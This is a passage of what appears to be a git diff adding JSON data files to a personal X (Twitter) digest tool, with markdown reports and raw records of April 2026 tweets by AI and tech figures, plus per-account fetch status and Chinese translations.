https://bauplanlabs.github.io/SAO-workshop/\n[原文链接](https://nitter.net/ceo_clickhouse/status/2046673188193701901#m)\n\n**[2026-04-21T16:50:26+00:00]**\n> RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have acc…\n[原文链接](https://nitter.net/NeurIPSConf/status/2046632664493384060#m)\n\n---\n\n### ✅ @soumithchintala — Soumith Chintala(4 条)\n\n**[2026-04-27T13:29:14+00:00]**\n> This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternatively, more and more…\n[原文链接](https://nitter.net/soumithchintala/status/2048756358820827564#m)\n\n**[2026-04-23T05:52:02+00:00]**\n> RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓 They’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in…\n[原文链接](https://nitter.net/hardmaru/status/2047191747793649805#m)\n\n**[2026-04-20T17:40:46+00:00]**\n> RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts. This …\n[原文链接](https://nitter.net/soumithchintala/status/2046282944139215141#m)\n\n**[2026-04-20T16:32:46+00:00]**\n> The Jensen + @dwarkesh_sp podcast was fantastic. Jensen is someone who understood how ecosystems work and someone who understands real-world trade, policy and controls work. And in some deeper sense …\n[原文链接](https://nitter.net/soumithchintala/status/2046265830908870983#m)\n\n---\n\n### ⚠️ @MikeAI — Michael(获取失败)\n\n- 错误: URLError: \n\n### ✅ @Ronald_vanLoon — Ronald van Loon(10 条)\n\n**[2026-04-27T13:45:07+00:00]**\n> How poor #Data foundations can undermine #AI success by Joanne Carew @CIOonline Learn more: https://bit.ly/4cGbKSG #MachineLearning #ArtificialIntelligence #DeepLearning #ML\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048760355367604358#m)\n\n**[2026-04-27T13:11:07+00:00]**\n> Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials via @IlirAliu_ #Robotics #ArtificialIntelligence #ML #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m)\n\n**[2026-04-27T13:00:20+00:00]**\n> R to @Ronald_vanLoon: My view is simple: The winners in enterprise AI will not be the companies with access to the most models. They will be the ones that build the best intelligent systems around th…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749087323820198#m)\n\n**[2026-04-27T13:00:20+00:00]**\n> R to @Ronald_vanLoon: The second misconception I keep seeing: Too many teams think they have to choose between open models and proprietary models. They do not. The smarter path is hybrid. → proprieta…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m)\n\n**[2026-04-27T13:00:19+00:00]**\n> R to @Ronald_vanLoon: My biggest takeaway: Models are becoming components, not products. What matters now is the system around them: → runtimes → memory → tool access → orchestration → secure executi…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749081464287511#m)\n\n**[2026-04-27T13:00:18+00:00]**\n> Most enterprise AI strategies are already behind. Not because they picked the wrong model, but because they are still thinking at the model layer. The real shift is happening one level up, where AI b…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749077911736401#m)\n\n**[2026-04-27T12:50:08+00:00]**\n> Shape-Shifting Wheels by KIMM Let Wheelchairs Climb Stairs and Conquer Any Terrain by @spaceandtech_ #Innovation #EmergingTech #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048746516324487529#m)\n\n**[2026-04-27T12:18:17+00:00]**\n> AI Q: The Emotion-Reading Humanoid #Robot That Reacts Like a Real Being via @XRoboHub #Robots #ArtificialIntelligence #Innovation #Technology #Tech\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048738501798121537#m)\n\n**[2026-04-23T06:23:14+00:00]**\n> RT by @Ronald_vanLoon: Treventus Scan #Robot Digitizes Up to 2,500 Pages Per Hour by @AadityaAnand_11 #Robotics #Innovation #EmergingTech #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047199600872665579#m)\n\n**[2026-04-23T05:50:01+00:00]**\n> RT by @Ronald_vanLoon: 12 #AI Terms to Learn by @Python_Dv #ArtificialIntelligence #MachineLearning #ML #MI\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047191242535063594#m)\n\n---\n\n### ✅ @erikbryn — Erik Brynjolfsson(7 条)\n\n**[2026-04-25T03:06:05+00:00]**\n> Steve Jurvetson has a knack for seeing the future more clearly than just about anyone. Here are some of his insights from his visit to my Lab. @FutureJurvetson @Stanford @DigEconLab\n[原文链接](https://nitter.net/erikbryn/status/2047874760542200042#m)\n\n**[2026-04-24T23:32:43+00:00]**\n> RT by @erikbryn: Interesting study by @erikbryn and @avi_collis showing big consumer welfare gains from AI. Reminds us that large portion of the economic value of AI will not show up in traditional e…\n[原文链接](https://nitter.net/RonnieChatterji/status/2047821064437424288#m)\n\n**[2026-04-23T18:14:10+00:00]**\n> RT by @erikbryn: Congratulations to Lab Digital Fellow Angela Aristidou, Digital Fellow @avi_collis, and Research Scientist @d_vidnguyen for being a part of @GoogleAI's inaugural group of global econ…\n[原文链接](https://nitter.net/DigEconLab/status/2047378514240999569#m)\n\n**[2026-04-22T01:22:04+00:00]**\n> RT by @erikbryn: Thanks for coming in today, and for sharing your feedback on my team’s idea! Your optimistic take on the value that humans will continue to deliver was so refreshing.\n[原文链接](https://nitter.net/TejuAdeyinka/status/2046761422148018260#m)\n\n**[2026-04-21T21:13:05+00:00]**\n> RT by @erikbryn: How do AI agents influence knowledge work? @SuproteemSarkar's (@UChicago) talk at the DEL Seminar Series is now available on YouTube! Moderated by @erikbryn, Sarkar discusses three p…\n[原文链接](https://nitter.net/DigEconLab/status/2046698761221783753#m)\n\n**[2026-04-21T17:10:57+00:00]**\n> RT by @erikbryn: Excited to speak at my friend @erikbryn’s ECON 295/CS 323 class at @Stanford today. Questions?\n[原文链接](https://nitter.net/saranormous/status/2046637828025835983#m)\n\n**[2026-04-20T15:07:11+00:00]**\n> Here's a crisp summary by @EconChrisClarke of some of the key findings of our Canaries in the Coal Mine, the counter arguments, the counter-counter arguments and the complementary research by others.…\n[原文链接](https://nitter.net/erikbryn/status/2046244291945927102#m)\n\n---\n\n### ✅ @liuliu — 刘进(3 条)\n\n**[2026-04-24T04:05:41+00:00]**\n> I've been thinking about local LLMs a lot these days.\n[原文链接](https://nitter.net/liuliu/status/2047527371486658814#m)\n\n**[2026-04-23T17:57:10+00:00]**\n> I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.\n[原文链接](https://nitter.net/liuliu/status/2047374234004115719#m)\n\n**[2026-04-22T16:16:24+00:00]**\n> Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work! Ask Codex to implement a segmented file downloader: didn’t even get the completion blo…\n[原文链接](https://nitter.net/liuliu/status/2046986486629986435#m)\n\n---\n\n### ⚠️ @二级炒家 — 二级炒家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ⚠️ @王川 — 王川(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ⚠️ @老胡 — 老胡(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ⚠️ @比特币超级玩家 — 超级玩家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n", + "monthly_analysis_md": "# X平台资讯深度分析报告\n\n**报告日期**: 2026-04-27T14:08:29.375190+00:00\n**分析账号**: 33个 | **活跃账号**: 17个 | **推文总量**: 145条\n\n---\n\n## 一、总体概览\n\n- 本报告基于 X 关注列表近30天 RSS 数据自动生成。\n- 默认口径:按账号聚合、按推文主题词粗分层。\n\n## 二、主题分布\n\n- **其他**:100 条\n- **模型能力**:27 条\n- **投融资与并购**:8 条\n- **交易与市场**:7 条\n- **算力与芯片**:3 条\n\n## 三、活跃账号 Top10\n\n- @HarryStebbings: 10 条\n- @Ronald_vanLoon: 10 条\n- @JeffDean: 10 条\n- @GaryMarcus: 10 条\n- @sama: 10 条\n- @paulg: 10 条\n- @elonmusk: 10 条\n- @jason: 10 条\n- @DavidSacks: 10 条\n- @ylecun: 10 条\n\n## 四、代表性推文\n\n- @HarryStebbings | 2026-04-27T14:02:33+00:00\n - R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 Apple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-4…\n - https://nitter.net/HarryStebbings/status/2048764743205134644#m\n- @HarryStebbings | 2026-04-27T14:02:33+00:00\n - Adam Foroughi is by far one of the best CEOs I have ever interviewed. Candidly he is insanely stern and cold but also obsessive, focused and utterly brilliant. With Adam there is …\n - https://nitter.net/HarryStebbings/status/2048764741435179442#m\n- @Ronald_vanLoon | 2026-04-27T13:45:07+00:00\n - How poor #Data foundations can undermine #AI success by Joanne Carew @CIOonline Learn more: https://bit.ly/4cGbKSG #MachineLearning #ArtificialIntelligence #DeepLearning #ML\n - https://nitter.net/Ronald_vanLoon/status/2048760355367604358#m\n- @JeffDean | 2026-04-27T13:40:08+00:00\n - The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conve…\n - https://nitter.net/JeffDean/status/2048759102390899142#m\n- @GaryMarcus | 2026-04-27T13:32:43+00:00\n - ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT a…\n - https://nitter.net/GaryMarcus/status/2048757233174122827#m\n- @HarryStebbings | 2026-04-27T13:30:16+00:00\n - Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. A…\n - https://nitter.net/HarryStebbings/status/2048756619622707452#m\n- @soumithchintala | 2026-04-27T13:29:14+00:00\n - This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternat…\n - https://nitter.net/soumithchintala/status/2048756358820827564#m\n- @sama | 2026-04-27T13:24:26+00:00\n - we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.…\n - https://nitter.net/sama/status/2048755148361707946#m\n- @Ronald_vanLoon | 2026-04-27T13:11:07+00:00\n - Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials via @IlirAliu_ #Robotics #ArtificialIntelligence #ML #Innovation #Technology\n - https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m\n- @sama | 2026-04-27T13:09:30+00:00\n - this is so good: https://paulgraham.com/kids.html\n - https://nitter.net/sama/status/2048751392031203544#m\n- @Ronald_vanLoon | 2026-04-27T13:00:20+00:00\n - R to @Ronald_vanLoon: My view is simple: The winners in enterprise AI will not be the companies with access to the most models. They will be the ones that build the best intellige…\n - https://nitter.net/Ronald_vanLoon/status/2048749087323820198#m\n- @Ronald_vanLoon | 2026-04-27T13:00:20+00:00\n - R to @Ronald_vanLoon: The second misconception I keep seeing: Too many teams think they have to choose between open models and proprietary models. They do not. The smarter path is…\n - https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m\n- @Ronald_vanLoon | 2026-04-27T13:00:19+00:00\n - R to @Ronald_vanLoon: My biggest takeaway: Models are becoming components, not products. What matters now is the system around them: → runtimes → memory → tool access → orchestrat…\n - https://nitter.net/Ronald_vanLoon/status/2048749081464287511#m\n- @Ronald_vanLoon | 2026-04-27T13:00:18+00:00\n - Most enterprise AI strategies are already behind. Not because they picked the wrong model, but because they are still thinking at the model layer. The real shift is happening one …\n - https://nitter.net/Ronald_vanLoon/status/2048749077911736401#m\n- @Ronald_vanLoon | 2026-04-27T12:50:08+00:00\n - Shape-Shifting Wheels by KIMM Let Wheelchairs Climb Stairs and Conquer Any Terrain by @spaceandtech_ #Innovation #EmergingTech #Technology\n - https://nitter.net/Ronald_vanLoon/status/2048746516324487529#m\n- @GaryMarcus | 2026-04-27T12:48:41+00:00\n - R to @GaryMarcus: Stop blaming the users. It’s not that simple:\n - https://nitter.net/GaryMarcus/status/2048746152749846549#m\n- @GaryMarcus | 2026-04-27T12:36:05+00:00\n - People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right. Users *are*screwing up - by letting vibe coded stuff access their files, wi…\n - https://nitter.net/GaryMarcus/status/2048742983684784239#m\n- @GaryMarcus | 2026-04-27T12:20:17+00:00\n - “Vibe coded disasters piling up on Reddit”\n - https://nitter.net/GaryMarcus/status/2048739005525877072#m\n- @Ronald_vanLoon | 2026-04-27T12:18:17+00:00\n - AI Q: The Emotion-Reading Humanoid #Robot That Reacts Like a Real Being via @XRoboHub #Robots #ArtificialIntelligence #Innovation #Technology #Tech\n - https://nitter.net/Ronald_vanLoon/status/2048738501798121537#m\n- @paulg | 2026-04-27T10:01:28+00:00\n - One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.\n - https://nitter.net/paulg/status/2048704073356935676#m\n\n---\n\n*本报告由系统自动生成,供月度复盘使用。*\n", + "paths": { + "tweet_summary_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/推文汇总_202604.md", + "monthly_analysis_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/月度深度分析_202604.md" + } +} \ No newline at end of file diff --git a/data/x_brief/history/20260427_143926.json b/data/x_brief/history/20260427_143926.json new file mode 100644 index 0000000..105d654 --- /dev/null +++ b/data/x_brief/history/20260427_143926.json @@ -0,0 +1,1738 @@ +{ + "generated_at": "2026-04-27T14:36:21.455665+00:00", + "period": { + "days": 7, + "start_utc": "2026-04-20T14:35:39.763440+00:00", + "end_utc": "2026-04-27T14:36:21.455665+00:00", + "month_tag": "202604" + }, + "overview": { + "total_accounts": 33, + "active_accounts": 17, + "total_tweets": 145, + "failed_accounts": 4 + }, + "accounts": [ + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "gregbrockman", + "account": "@gregbrockman", + "name": "Greg Brockman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "andrejkarpathy", + "account": "@andrejkarpathy", + "name": "Andrej Karpathy", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "lmsqueegie", + "account": "@lmsqueegie", + "name": "Lars Nielsen", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "david__tian", + "account": "@david__tian", + "name": "David Tian", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "Bitking_", + "account": "@Bitking_", + "name": "BTCKing", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "" + }, + { + "handle": "AltcoinBuzz", + "account": "@AltcoinBuzz", + "name": "Altcoin Buzz", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "TradingGods", + "account": "@TradingGods", + "name": "Trading Gods", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "Warrior_Trading", + "account": "@Warrior_Trading", + "name": "Warrior Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "ProfTrading", + "account": "@ProfTrading", + "name": "Profitable Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "直播带逛Tommy", + "account": "@直播带逛Tommy", + "name": "Tommy", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 4, + "error": "" + }, + { + "handle": "MikeAI", + "account": "@MikeAI", + "name": "Michael", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 7, + "error": "" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "" + }, + { + "handle": "二级炒家", + "account": "@二级炒家", + "name": "二级炒家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "王川", + "account": "@王川", + "name": "王川", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "老胡", + "account": "@老胡", + "name": "老胡", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "比特币超级玩家", + "account": "@比特币超级玩家", + "name": "超级玩家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + } + ], + "tweets": [ + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "yep, that’s what I do. \n\nI am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me.\n\ni don’t think that is going to end well.", + "url": "https://nitter.net/GaryMarcus/status/2048771044987777428#m", + "published_at": "2026-04-27T14:27:36+00:00", + "title_zh": "是的,这就是我的工作。\n我越来越担心中国人在汲取我的智慧,而美国许多人却试图忽视我。\n我认为这种情况不会有个好结局" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "#AI Referees the Sand: Real-Time Beach Volleyball Analysis — Enhancing the Game or Changing Its Soul?\nby @measure_plan\n\n#ArtificialIntelligence #MachineLearning #ML", + "url": "https://nitter.net/Ronald_vanLoon/status/2048769934587523460#m", + "published_at": "2026-04-27T14:23:11+00:00", + "title_zh": "#人工智能 裁判赋予沙滩排球新生命:实时分析是提升比赛还是改变了其本质?\nby @measure_plan\n#人工智能 #机器学习 #ML" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5\nApple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/id958230465?i=1000763769440\nYoutube https://youtu.be/dlPCz8Jwypw", + "url": "https://nitter.net/HarryStebbings/status/2048764743205134644#m", + "published_at": "2026-04-27T14:02:33+00:00", + "title_zh": "Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5\nApple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/id958230465?i=1000763769440\nYoutube https://youtu.be/dlPCz8Jwypw" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Adam Foroughi is by far one of the best CEOs I have ever interviewed.\n\nCandidly he is insanely stern and cold but also obsessive, focused and utterly brilliant.\n\nWith Adam there is zero fluff, like none. He says what he means and means what he says.\n\nApplovin does $10M EBITDA per head.\n\nThey have 80%+ margins.\n\nThey do $5.48BN in revenue.\n\nNo business on the planet has numbers like Applovin.\n\nFollowing the discussion, I wrote up my biggest lessons from sitting down with him and summarised them below:\n\n1. Are People Ready for the AI Future That Is Within Every Company?\n\nTrue AI integration requires a massive \"leveling up\" of talent. Companies must be honest about the path forward: keeping employees who fail to adopt AI creates a \"blockade\" to reaching a truly AI-native state. Consequently, we should expect continued tech layoffs as organizations prioritize efficiency over legacy headcount.\n\n2. Biggest Advice on Token Budgeting and Token Maxing?\n\nTreating tokens as a simple budget or leaderboard is \"flawed logic\". If you incentivize raw usage, teams will simply create high-volume \"crap\" that burns capital without driving revenue. Instead, optimize for specific KPIs where token consumption aligns directly with business growth; when revenue is on the other side, the \"budget\" mindset disappears.\n\n3. Can You Have a Team Full of Only A Players?\n\nAn organization cannot thrive if A players are surrounded by B, C, or D players. AppLovin slimmed its HR department from 80 people to 15 by retaining only \"doers\" who don't get bogged down in the process. The goal is a lean culture of individual contributors who want to make a difference without needing heavy management layers.\n\n4. Do the Majority of Company Teams Need to Be Rebuilt for the Technology We Have Today?\n\nIf a role is likely to be automated, or if a department is too slow to adopt AI, it is time to rebuild that organization from the ground up. Foroughi cut staff by 40-50% in most departments during a year of triple-digit growth to force the organization into an automated, efficient state.\n\n5. Why Investors Need to Give Ceos Better Comp Packages\n\nFounders take massive risks to build something out of nothing, and they need continued upside to stay mentally motivated. If a CEO is expected to work without performance-based incentives, they may drift toward new ventures rather than staying committed to the \"lonely, stressful\" task of scaling a public company.\n\n6. Why This $160 Billion Company Does Not Have Any Learning and Development\n\nStructured L&D is often disconnected from the reality of high-performance work. The best employees are curious enough to figure things out on their own. By documenting all communication in transcripts and chats, new hires can use AI models to summarize tribal knowledge and develop themselves more effectively than any formal training program.\n\n(links below)", + "url": "https://nitter.net/HarryStebbings/status/2048764741435179442#m", + "published_at": "2026-04-27T14:02:33+00:00", + "title_zh": "Adam Foroughi是我采访过的最优秀的CEO之一。\n坦率地说他极度严厉冷静但极具专注力和才华。\n与Adam交谈没有丁点虚饰,他言出必行。\nApplovin每人1000万美元的息税折旧摊销前利润。\n毛利率超过80%。\n年收入54.8亿美元。\n全球没有哪家企业能匹配AppLovin的数据水平。\n讨论结束后,我整理了与他交流获得的最大启示并总结了" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "How poor #Data foundations can undermine #AI success\nby Joanne Carew @CIOonline\n\nLearn more: https://bit.ly/4cGbKSG\n\n#MachineLearning #ArtificialIntelligence #DeepLearning #ML", + "url": "https://nitter.net/Ronald_vanLoon/status/2048760355367604358#m", + "published_at": "2026-04-27T13:45:07+00:00", + "title_zh": "如何薄弱的数据基础可以破坏AI成功\nby Joanne Carew @CIOonline\n了解更多信息:https://bit.ly/4cGbKSG\n#机器学习 #人工智能 #深度学习 #ML" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", + "url": "https://nitter.net/JeffDean/status/2048759102390899142#m", + "published_at": "2026-04-27T13:40:08+00:00", + "title_zh": "上周在Cloud Next会议上与Amin Vahdat、@gilbert和@djrosent的对话视频已发布。\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n感谢这场精彩的对话!" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your data. ⚠️\n\n𝗜𝘁’𝘀 𝗮𝗯𝗼𝘂𝘁 𝗔𝗜 𝘀𝗮𝗳𝗲𝘁𝘆. \n\nThe user wasn’t (totally) naive. He thought system prompts and guardrails would save him. They didn’t. \n\nIn this case he lost data. Eventually people will lose lives.", + "url": "https://nitter.net/GaryMarcus/status/2048757233174122827#m", + "published_at": "2026-04-27T13:32:43+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Two areas I would love to invest that are non-technical: \n\n1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. \n\nAmazing business. Insane retention numbers. Super high margin. \n\n2. AI re-skilling facilities. Go to Canary Wharf, set up AI training centre. Partner with Goldman, JP Morgan etc etc. Sign enterprise agreement with them to train all new employees. \n\nBoth absolute goldmines!", + "url": "https://nitter.net/HarryStebbings/status/2048756619622707452#m", + "published_at": "2026-04-27T13:30:16+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to the cloud era enterprise pains. I'm sure these issues would apply to all the other AI providers.\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1sspwz2/psa_anthropic_bans_organizations_without_warning/", + "url": "https://nitter.net/soumithchintala/status/2048756358820827564#m", + "published_at": "2026-04-27T13:29:14+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 2030.", + "url": "https://nitter.net/sama/status/2048755148361707946#m", + "published_at": "2026-04-27T13:24:26+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials\nvia @IlirAliu_\n \n#Robotics #ArtificialIntelligence #ML #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m", + "published_at": "2026-04-27T13:11:07+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this is so good:\n\nhttps://paulgraham.com/kids.html", + "url": "https://nitter.net/sama/status/2048751392031203544#m", + "published_at": "2026-04-27T13:09:30+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: My view is simple:\n\nThe winners in enterprise AI will not be the companies with access to the most models.\n\nThey will be the ones that build the best intelligent systems around them.\n\nIf you want the full breakdown, watch the video and tell me what part of your AI stack you are rethinking first.\n\nWhat do you think becomes the real source of advantage in the next 12 months, the model itself, or the orchestration layer around it?\n\nCheck out the full article: https://www.linkedin.com/pulse/agentic-ai-reshaping-enterprise-strategy-faster-than-you-van-loon-9rfme", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749087323820198#m", + "published_at": "2026-04-27T13:00:20+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: The second misconception I keep seeing:\n\nToo many teams think they have to choose between open models and proprietary models.\n\nThey do not.\n\nThe smarter path is hybrid.\n\n→ proprietary models for scale and broad capability\n→ open models for flexibility and control\n→ orchestration layers to route each task to the best-fit model in real time\n\nThat is how you 